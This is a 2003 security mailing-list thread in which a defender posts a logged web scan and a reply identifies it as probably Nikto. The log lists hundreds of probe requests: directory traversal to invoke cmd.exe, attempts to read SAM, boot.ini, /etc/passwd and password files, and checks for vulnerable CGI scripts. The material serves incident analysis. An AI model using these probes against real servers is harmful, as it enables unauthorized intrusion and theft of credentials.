Re: Does anyone recognize the scanner that causes this pattern ?

From: Laurent Luyckx (laurentat_private)
Date: Sun Apr 06 2003 - 23:58:58 PDT
Next message: Jerry Shenk: "RE: Does anyone recognize the scanner that causes this pattern ?"
Previous message: deanat_private: "Does anyone recognize the scanner that causes this pattern ?"
In reply to: deanat_private: "Does anyone recognize the scanner that causes this pattern ?"
Next in thread: Jerry Shenk: "RE: Does anyone recognize the scanner that causes this pattern ?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Maybe nikto (http://www.cirt.net/code/nikto.shtml)

On Sun, 2003-04-06 at 21:24, deanat_private wrote:
> I recently logged a fairly extensive web scan and am trying to ID the 
> tool responsible. Has anyone seen this particular pattern before ?
> 
> HEAD /.html/............*/config.sys HTTP/1.0\x0a\x0a
> HEAD /.html/............./config.sys HTTP/1.0\x0a\x0a
> HEAD /.html/............/autoexec.bat HTTP/1.0\x0a\x0a
> HEAD /.jsp/WEB-INF/classes/Env.java HTTP/1.0\x0a\x0a
> HEAD /.nsf/../winnt/win.ini HTTP/1.0\x0a\x0a
> HEAD /../boot.ini HTTP/1.0\x0a\x0a
> HEAD /../config.sys HTTP/1.0\x0a\x0a
> HEAD /a.asp/..../..../winnt/repair/sam HTTP/1.0\x0a\x0a
> HEAD /a.jsp//..//..//..//..//..//../winnt/win.ini HTTP/1.0\x0a\x0a
> HEAD /cgi HTTP/1.0\x0a\x0a
> HEAD /cgi/ HTTP/1.0\x0a\x0a
> HEAD /cgibin HTTP/1.0\x0a\x0a
> HEAD /cgi-bin HTTP/1.0\x0a\x0a
> HEAD /cgibin/ HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/ HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/../../../../winnt/system32/cmd.exe HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/......../winnt/system32/cmd.exe HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/............winntsystem32cmd.exe?/c+dir+c: HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/sam._ HTTP/1.0\x0a\x0a
> HEAD /cgi-win HTTP/1.0\x0a\x0a
> HEAD /cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
> HEAD /doc HTTP/1.0\x0a\x0a
> HEAD /iisadmin HTTP/1.0\x0a\x0a
> HEAD /iisadmin/ HTTP/1.0\x0a\x0a
> HEAD /iisamples/Sdk HTTP/1.0\x0a\x0a
> HEAD /iissamples HTTP/1.0\x0a\x0a
> HEAD /iissamples/Default HTTP/1.0\x0a\x0a
> HEAD /script/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
> HEAD /scripts HTTP/1.0\x0a\x0a
> HEAD /scripts/ HTTP/1.0\x0a\x0a
> HEAD /scripts/* HTTP/1.0\x0a\x0a
> HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> \x0a\x0a
> HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
> \x0a\x0a
> HEAD /scripts/../../cmd.exe HTTP/1.0\x0a\x0a
> HEAD /scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
> HEAD /scripts/..../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
> HEAD /scripts/........../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
> HEAD /scripts/........../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
> \x0a\x0a
> HEAD /scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
> HEAD /scripts/cmd.exe HTTP/1.0\x0a\x0a
> HEAD /scripts/cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
> HEAD /scripts/iisadmin/default.htm HTTP/1.0\x0a\x0a
> HEAD /scripts/iisadmin/samples HTTP/1.0\x0a\x0a
> HEAD /scripts/iisadmin/tools HTTP/1.0\x0a\x0a
> HEAD /scripts/perl HTTP/1.0\x0a\x0a
> HEAD /scripts/samples HTTP/1.0\x0a\x0a
> HEAD /scripts/tools HTTP/1.0\x0a\x0a
> HEAD /search HTTP/1.0\x0a\x0a
> HEAD /server-info HTTP/1.0\x0a\x0a
> HEAD /server-status HTTP/1.0\x0a\x0a
> HEAD /_AuthChangeUrl HTTP/1.0\x0a\x0a
> HEAD /_AuthChangeUrl? HTTP/1.0\x0a\x0a
> HEAD /_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
> HEAD /_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
> \x0a\x0a
> HEAD /_mem_bin/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
> HEAD /_mem_bin/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
> \x0a\x0a
> HEAD /_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
> HEAD /_private HTTP/1.0\x0a\x0a
> HEAD /_vti_bin/_vti_adm HTTP/1.0\x0a\x0a
> HEAD /_vti_bin/_vti_aut HTTP/1.0\x0a\x0a
> HEAD /_vti_bin HTTP/1.0\x0a\x0a
> HEAD /_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
> HEAD /_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
> \x0a\x0a
> HEAD /_vti_bin/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
> HEAD /_vti_bin/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
> \x0a\x0a
> HEAD /_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/_vti_cnf HTTP/1.0\x0a\x0a
> HEAD /_vti_inf.html HTTP/1.0\x0a\x0a
> HEAD /_vti_log HTTP/1.0\x0a\x0a
> HEAD /_vti_pvt HTTP/1.0\x0a\x0a
> HEAD /_vti_pvt/ HTTP/1.0\x0a\x0a
> HEAD /_vti_bin/shtml.dll/_vti_rpc HTTP/1.0\x0a\x0a
> HEAD /_vti_txt HTTP/1.0\x0a\x0a
> HEAD /abczxv.htw HTTP/1.0\x0a\x0a
> HEAD /msadc/samples/adctest.asp HTTP/1.0\x0a\x0a
> HEAD /scripts/Carello/add.exe HTTP/1.0\x0a\x0a
> HEAD /cfdocs/exampleapp/publish/admin/addcontent.cfm HTTP/1.0\x0a\x0a
> HEAD /_vti_adm/admin.dll HTTP/1.0\x0a\x0a
> HEAD /scripts/admin.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
> HEAD /_vti_pvt/administrator.pwd HTTP/1.0\x0a\x0a
> HEAD /_vti_pvt/administrators.pwd HTTP/1.0\x0a\x0a
> HEAD /session/adminlogin HTTP/1.0\x0a\x0a
> HEAD /admisapi/ HTTP/1.0\x0a\x0a
> HEAD /iissamples/exair/search/advsearch.asp HTTP/1.0\x0a\x0a
> HEAD /Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%
> 2Fetc&dispsize=640&start=0 HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/alibaba.pl HTTP/1.0\x0a\x0a
> HEAD /app.cfm HTTP/1.0\x0a\x0a
> HEAD /cgi-dos/args.bat HTTP/1.0\x0a\x0a
> HEAD /cgi-dos/args.cmd HTTP/1.0\x0a\x0a
> HEAD /_vti_bin/_vti_aut/author.dll HTTP/1.0\x0a\x0a
> HEAD /_vti_pvt/author.log HTTP/1.0\x0a\x0a
> HEAD /_vti_pvt/authors.pwd HTTP/1.0\x0a\x0a
> HEAD /autoexec.bat HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/bb-hostsvc.sh HTTP/1.0\x0a\x0a
> HEAD /scripts/bbs.pl%3F+.htr HTTP/1.0\x0a\x0a
> HEAD /bdir.htr HTTP/1.0\x0a\x0a
> HEAD /cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.0\x0a\x0a
> HEAD /bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> \x0a\x0a
> HEAD /bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
> \x0a\x0a
> HEAD /bin/scripts/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
> HEAD /bin/scripts/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
> \x0a\x0a
> HEAD /bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
> HEAD /common/browser.inc HTTP/1.0\x0a\x0a
> HEAD /scripts/c32web.exe HTTP/1.0\x0a\x0a
> HEAD /carbo.dll HTTP/1.0\x0a\x0a
> HEAD /scripts/Carello/Carello.dll HTTP/1.0\x0a\x0a
> HEAD /scripts/cart32.exe HTTP/1.0\x0a\x0a
> HEAD /scripts/cart32.exe/cart32clientlist HTTP/1.0\x0a\x0a
> HEAD /catalog.nsf HTTP/1.0\x0a\x0a
> HEAD /catalog.nsf/ HTTP/1.0\x0a\x0a
> HEAD /AdvWorks/equipment/catalog_type.asp HTTP/1.0\x0a\x0a
> HEAD /ASPSamp/AdvWorks/equipment/catalog_type.asp HTTP/1.0\x0a\x0a
> HEAD /WebShop/logs/cc.txt HTTP/1.0\x0a\x0a
> HEAD /WebShop/templates/cc.txt HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/ceilidh.exe HTTP/1.0\x0a\x0a
> HEAD /cfcache.map HTTP/1.0\x0a\x0a
> HEAD /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0\x0a\x0a
> HEAD /cfusion/database/cfsnippets.mdb HTTP/1.0\x0a\x0a
> HEAD /scripts/cgimail.exe HTTP/1.0\x0a\x0a
> HEAD /scripts/CGImail.exe HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/cgitest.exe HTTP/1.0\x0a\x0a
> HEAD /scripts/c32web.exe/ChangeAdminPassword HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/changepw.exe HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/c32web.exe/CheckError?error=53 HTTP/1.0\x0a\x0a
> HEAD /config/checks.txt HTTP/1.0\x0a\x0a
> HEAD /WebShop/logs/ck.log HTTP/1.0\x0a\x0a
> HEAD /msadc/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
> \x0a\x0a
> HEAD /msadc/..../..../..../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
> HEAD /msadc/..../..../..../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
> \x0a\x0a
> HEAD /msadc/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
> HEAD /msadc/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
> HEAD /msadc/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
> HEAD /msadc/msadcs.dll HTTP/1.0\x0a\x0a
> HEAD /scripts/tools/newdsn.exe HTTP/1.0\x0a\x0a
> HEAD /nofile.pl HTTP/1.0\x0a\x0a
> HEAD /_vti_bin/shtml.dll/nosuch.htm HTTP/1.0\x0a\x0a
> HEAD /scripts/no-such-file.pl HTTP/1.0\x0a\x0a
> HEAD /cfdocs/expelval/openfile.cfm HTTP/1.0\x0a\x0a
> HEAD /cfdocs/expeval/openfile.cfm HTTP/1.0\x0a\x0a
> HEAD /Admin_files/order.log HTTP/1.0\x0a\x0a
> HEAD /_private/orders.txt HTTP/1.0\x0a\x0a
> HEAD /config/orders.txt HTTP/1.0\x0a\x0a
> HEAD /wwwboard/passwd.txt HTTP/1.0\x0a\x0a
> HEAD /pbserver/ HTTP/1.0\x0a\x0a
> HEAD /pbserver/pbserver.dll HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/perl.exe HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/scripts/perl.exe HTTP/1.0\x0a\x0a
> HEAD /cgi-win/perl.exe HTTP/1.0\x0a\x0a
> HEAD /ows-bin/perlidlc.bat?&dir HTTP/1.0\x0a\x0a
> HEAD /scripts/pfieffer.bat HTTP/1.0\x0a\x0a
> HEAD /scripts/pfieffer.cmd HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/post32.exe HTTP/1.0\x0a\x0a
> HEAD /scripts/postinfo.asp HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/ppdscgi.exe HTTP/1.0\x0a\x0a
> HEAD /private HTTP/1.0\x0a\x0a
> HEAD /process_bug.cgi HTTP/1.0\x0a\x0a
> HEAD /iissamples/iissamples/query.asp HTTP/1.0\x0a\x0a
> HEAD /iissamples/issamples/query.asp HTTP/1.0\x0a\x0a
> HEAD /samples/search/queryhit.htm HTTP/1.0\x0a\x0a
> HEAD /cfusion/cfapps/security/data/realm.mdb HTTP/1.0\x0a\x0a
> HEAD /cfusion/cfapps/security/realm_.mdb HTTP/1.0\x0a\x0a
> HEAD /scripts/emurl/RECMAN.dll HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/redirect.exe HTTP/1.0\x0a\x0a
> HEAD /_private/register.txt HTTP/1.0\x0a\x0a
> HEAD /_private/registrations.txt HTTP/1.0\x0a\x0a
> HEAD /scripts/repost.asp HTTP/1.0\x0a\x0a
> HEAD /bin/scripts/openvendor/gnete/RetrievePNBody.asp HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/rguest.exe HTTP/1.0\x0a\x0a
> HEAD /scripts/rguest.exe HTTP/1.0\x0a\x0a
> HEAD /robots.txt HTTP/1.0\x0a\x0a
> HEAD /cfdocs/root.cfm HTTP/1.0\x0a\x0a
> HEAD /scripts/root.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
> HEAD /sample.asp HTTP/1.0\x0a\x0a
> HEAD /IISSAMPLES/ExAir/Search/search.asp HTTP/1.0\x0a\x0a
> HEAD /search.dll HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/search97.vts HTTP/1.0\x0a\x0a
> HEAD /search97.vts HTTP/1.0\x0a\x0a
> HEAD /cfdocs/expeval/sendmail.cfm HTTP/1.0\x0a\x0a
> HEAD /_vti_pvt/service.grp HTTP/1.0\x0a\x0a
> HEAD /cfdocs/expelval/sendmail.cfm HTTP/1.0\x0a\x0a
> HEAD /_vti_pvt/service.pwd HTTP/1.0\x0a\x0a
> HEAD /servlet/SessionServlet HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/shop.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/shopper.cgi HTTP/1.0\x0a\x0a
> HEAD /_private/shopping_cart.mdb HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/c32web.exe/ShowAdminDir HTTP/1.0\x0a\x0a
> HEAD /iissamples/exair/howitworks/showcode.asp HTTP/1.0\x0a\x0a
> HEAD /msadc/samples/selector/showcode.asp HTTP/1.0\x0a\x0a
> HEAD /msadc/samples/selector/showcode.asp_2 HTTP/1.0\x0a\x0a
> HEAD /showfile.asp HTTP/1.0\x0a\x0a
> HEAD /_vti_bin/shtml.dll HTTP/1.0\x0a\x0a
> HEAD /_vti_pvt/shtml.dll HTTP/1.0\x0a\x0a
> HEAD /_vti_bin/shtml.exe HTTP/1.0\x0a\x0a
> HEAD /_vti_pvt/shtml.exe HTTP/1.0\x0a\x0a
> HEAD /ex/jsp/simple.jsp. HTTP/1.0\x0a\x0a
> HEAD /adsamples/config/site.csc HTTP/1.0\x0a\x0a
> HEAD /scripts/slxweb.dll HTTP/1.0\x0a\x0a
> HEAD /smdata.dat HTTP/1.0\x0a\x0a
> HEAD /cfusion/database/smpolicy.mdb HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/snorkerz.bat HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/snorkerz.cmd HTTP/1.0\x0a\x0a
> HEAD /cfdocs/exampleapp/docs/sourcewindow.cfm HTTP/1.0\x0a\x0a
> HEAD /srchadm HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/statsconfig.pl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/test.bat HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/test.cgi HTTP/1.0\x0a\x0a
> HEAD /today.nsf HTTP/1.0\x0a\x0a
> HEAD /tree.dat HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/tst.bat HTTP/1.0\x0a\x0a
> HEAD /admin/ HTTP/1.0\x0a\x0a
> HEAD /administrator/ HTTP/1.0\x0a\x0a
> HEAD /bbs/ HTTP/1.0\x0a\x0a
> HEAD /bbs/admin/ HTTP/1.0\x0a\x0a
> HEAD /bbs/admin/config/ HTTP/1.0\x0a\x0a
> HEAD /bbs/data/ HTTP/1.0\x0a\x0a
> HEAD /bbs/db/ HTTP/1.0\x0a\x0a
> HEAD /bbs/include/ HTTP/1.0\x0a\x0a
> HEAD /cache-stats/ HTTP/1.0\x0a\x0a
> HEAD /card/ HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/admin/admin HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/Board/db/ HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/campas HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/counterfiglet/nc/f HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/jj HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/perl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/query HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/ssi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/wrap HTTP/1.0\x0a\x0a
> HEAD /config/ HTTP/1.0\x0a\x0a
> HEAD /customer/ HTTP/1.0\x0a\x0a
> HEAD /data/ HTTP/1.0\x0a\x0a
> HEAD /database/ HTTP/1.0\x0a\x0a
> HEAD /databases/ HTTP/1.0\x0a\x0a
> HEAD /db/ HTTP/1.0\x0a\x0a
> HEAD /dbase/ HTTP/1.0\x0a\x0a
> HEAD /deny/ HTTP/1.0\x0a\x0a
> HEAD /devel/ HTTP/1.0\x0a\x0a
> HEAD /docs/ HTTP/1.0\x0a\x0a
> HEAD /document/ HTTP/1.0\x0a\x0a
> HEAD /documents/ HTTP/1.0\x0a\x0a
> HEAD /down/ HTTP/1.0\x0a\x0a
> HEAD /download/ HTTP/1.0\x0a\x0a
> HEAD /downloads/ HTTP/1.0\x0a\x0a
> HEAD /example/ HTTP/1.0\x0a\x0a
> HEAD /exec/show/config/cr HTTP/1.0\x0a\x0a
> HEAD /file/ HTTP/1.0\x0a\x0a
> HEAD /files/ HTTP/1.0\x0a\x0a
> HEAD /forum/ HTTP/1.0\x0a\x0a
> HEAD /ftp/ HTTP/1.0\x0a\x0a
> HEAD /girl/ HTTP/1.0\x0a\x0a
> HEAD /girls/ HTTP/1.0\x0a\x0a
> HEAD /hire/ HTTP/1.0\x0a\x0a
> HEAD /htdocs/ HTTP/1.0\x0a\x0a
> HEAD /idea/ HTTP/1.0\x0a\x0a
> HEAD /ideas/ HTTP/1.0\x0a\x0a
> HEAD /image/ HTTP/1.0\x0a\x0a
> HEAD /images/ HTTP/1.0\x0a\x0a
> HEAD /img/ HTTP/1.0\x0a\x0a
> HEAD /inc/ HTTP/1.0\x0a\x0a
> HEAD /include/ HTTP/1.0\x0a\x0a
> HEAD /include/inc/ HTTP/1.0\x0a\x0a
> HEAD /includes/ HTTP/1.0\x0a\x0a
> HEAD /incoming/ HTTP/1.0\x0a\x0a
> HEAD /install/ HTTP/1.0\x0a\x0a
> HEAD /lib/ HTTP/1.0\x0a\x0a
> HEAD /library/ HTTP/1.0\x0a\x0a
> HEAD /linux/ HTTP/1.0\x0a\x0a
> HEAD /logging/ HTTP/1.0\x0a\x0a
> HEAD /manual/ HTTP/1.0\x0a\x0a
> HEAD /misc/ HTTP/1.0\x0a\x0a
> HEAD /mp3/ HTTP/1.0\x0a\x0a
> HEAD /mrtg/ HTTP/1.0\x0a\x0a
> HEAD /msql/ HTTP/1.0\x0a\x0a
> HEAD /mysql/ HTTP/1.0\x0a\x0a
> HEAD /number/ HTTP/1.0\x0a\x0a
> HEAD /pds/ HTTP/1.0\x0a\x0a
> HEAD /perl HTTP/1.0\x0a\x0a
> HEAD /phone/ HTTP/1.0\x0a\x0a
> HEAD /php/ HTTP/1.0\x0a\x0a
> HEAD /php3/ HTTP/1.0\x0a\x0a
> HEAD /php4/ HTTP/1.0\x0a\x0a
> HEAD /porno/ HTTP/1.0\x0a\x0a
> HEAD /ports/ HTTP/1.0\x0a\x0a
> HEAD /private/ HTTP/1.0\x0a\x0a
> HEAD /program/ HTTP/1.0\x0a\x0a
> HEAD /programming/ HTTP/1.0\x0a\x0a
> HEAD /programs/ HTTP/1.0\x0a\x0a
> HEAD /public/ HTTP/1.0\x0a\x0a
> HEAD /secret/ HTTP/1.0\x0a\x0a
> HEAD /secrets/ HTTP/1.0\x0a\x0a
> HEAD /server_stats/ HTTP/1.0\x0a\x0a
> HEAD /server-info/ HTTP/1.0\x0a\x0a
> HEAD /server-status/ HTTP/1.0\x0a\x0a
> HEAD /set/ HTTP/1.0\x0a\x0a
> HEAD /setting/ HTTP/1.0\x0a\x0a
> HEAD /setup/ HTTP/1.0\x0a\x0a
> HEAD /sex/ HTTP/1.0\x0a\x0a
> HEAD /snmp/ HTTP/1.0\x0a\x0a
> HEAD /source/ HTTP/1.0\x0a\x0a
> HEAD /sources/ HTTP/1.0\x0a\x0a
> HEAD /sql/ HTTP/1.0\x0a\x0a
> HEAD /stat/ HTTP/1.0\x0a\x0a
> HEAD /statistics/ HTTP/1.0\x0a\x0a
> HEAD /Stats/ HTTP/1.0\x0a\x0a
> HEAD /stats/ HTTP/1.0\x0a\x0a
> HEAD /telephone/ HTTP/1.0\x0a\x0a
> HEAD /temp/ HTTP/1.0\x0a\x0a
> HEAD /temporary/ HTTP/1.0\x0a\x0a
> HEAD /test/ HTTP/1.0\x0a\x0a
> HEAD /tool/ HTTP/1.0\x0a\x0a
> HEAD /tools/ HTTP/1.0\x0a\x0a
> HEAD /usage/ HTTP/1.0\x0a\x0a
> HEAD /weblog/ HTTP/1.0\x0a\x0a
> HEAD /weblogs/ HTTP/1.0\x0a\x0a
> HEAD /webstats/ HTTP/1.0\x0a\x0a
> HEAD /work/ HTTP/1.0\x0a\x0a
> HEAD /wstats/ HTTP/1.0\x0a\x0a
> HEAD /wwwlog/ HTTP/1.0\x0a\x0a
> HEAD /wwwstats/ HTTP/1.0\x0a\x0a
> HEAD /acid/ HTTP/1.0\x0a\x0a
> HEAD /acid/acid_main.php HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/ad.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/adcycle HTTP/1.0\x0a\x0a
> HEAD /secret/secret/add-user.shmtl HTTP/1.0\x0a\x0a
> HEAD /admin.php3?admin=anything HTTP/1.0\x0a\x0a
> HEAD /adpassword.txt HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/aglimpse HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/allmanage.pl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/allmanageup.pl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/amlite/amadmin.pl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/anacondaclip.pl?template=check HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/AnyForm2 HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/AT-admin.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/AT-generate.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/awl/auctionweaver.pl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/auktion.pl HTTP/1.0\x0a\x0a
> HEAD /banners.php?op=Change HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/bb-hist.sh HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0\x0a\x0a
> HEAD /examples/applications/bboard/bboard_frames.html HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/bizdb1-search.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/bnbform.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/build.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/cached_feed.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/cachemgr.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/cal_make.pl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/calender.pl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/calender_admin.pl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/s.cgi?q=a&tmpl=check HTTP/1.0\x0a\x0a
> HEAD /cgi-bin-sdb HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/cgiforum.pl HTTP/1.0\x0a\x0a
> HEAD /manage/cgi/cgiproc HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/cgiwrap HTTP/1.0\x0a\x0a
> HEAD /secret/secret/change-passwd.shtml HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/changepw.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/classifieds.cgi HTTP/1.0\x0a\x0a
> HEAD /caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd 
> HTTP/1.0\x0a\x0a
> HEAD /caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server HTTP/1.0
> \x0a\x0a
> HEAD /caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini HTTP/1.0
> \x0a\x0a
> HEAD /caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC HTTP/1.0
> \x0a\x0a
> HEAD /caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000 HTTP/1.0
> \x0a\x0a
> HEAD /servlet/com.livesoftware.jrun.plugins.jsp.JSP HTTP/1.0\x0a\x0a
> HEAD /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter HTTP/1.0\x0a\x0a
> HEAD /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/commerce.cgi?page=check HTTP/1.0\x0a\x0a
> HEAD /forum/common.php HTTP/1.0\x0a\x0a
> HEAD /phorum/common.php HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/Count.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/CrazyWWWBoard.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/csvform.pl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/htgrep HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/htmlscript HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/htsearch HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/htsearch?config=aaa HTTP/1.0\x0a\x0a
> HEAD /index.html.bak HTTP/1.0\x0a\x0a
> HEAD /index.html~ HTTP/1.0\x0a\x0a
> HEAD /index.js%2570 HTTP/1.0\x0a\x0a
> HEAD /index.php.bak HTTP/1.0\x0a\x0a
> HEAD /index.php~ HTTP/1.0\x0a\x0a
> HEAD /index.php3?vhosts[test]= HTTP/1.0\x0a\x0a
> HEAD /adminlogin?RCpage=/sysadmin/index.stm HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/info2www HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/infosrch.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/lasso.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/loadpage.cgi HTTP/1.0\x0a\x0a
> HEAD /ConsoleHelp/login.jsp HTTP/1.0\x0a\x0a
> HEAD /login.jsp HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/mailfile.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/mailform.pl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/maillist.pl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/mailnews.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/mailto.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/man.sh HTTP/1.0\x0a\x0a
> HEAD /manual.php HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/mdma.bat HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES= HTTP/1.0\x0a\x0a
> HEAD /class/mysql.class HTTP/1.0\x0a\x0a
> HEAD /names.nsf HTTP/1.0\x0a\x0a
> HEAD /ncl_items.html?SUBJECT=2097 HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/netauth.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/news/news.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/nph-maillist.pl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/nph-publish HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/nph-test-cgi HTTP/1.0\x0a\x0a
> HEAD /examples/jsp/num/numguess.js%70 HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/pagelog.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/pals-cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/newsdesk.cgi?t=../pass.txt HTTP/1.0\x0a\x0a
> HEAD /opendir.php?requesturl=/etc/passwd HTTP/1.0\x0a\x0a
> HEAD /piranha/secure/passwd.php3 HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/perlshop.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/pfdisplay.cgi HTTP/1.0\x0a\x0a
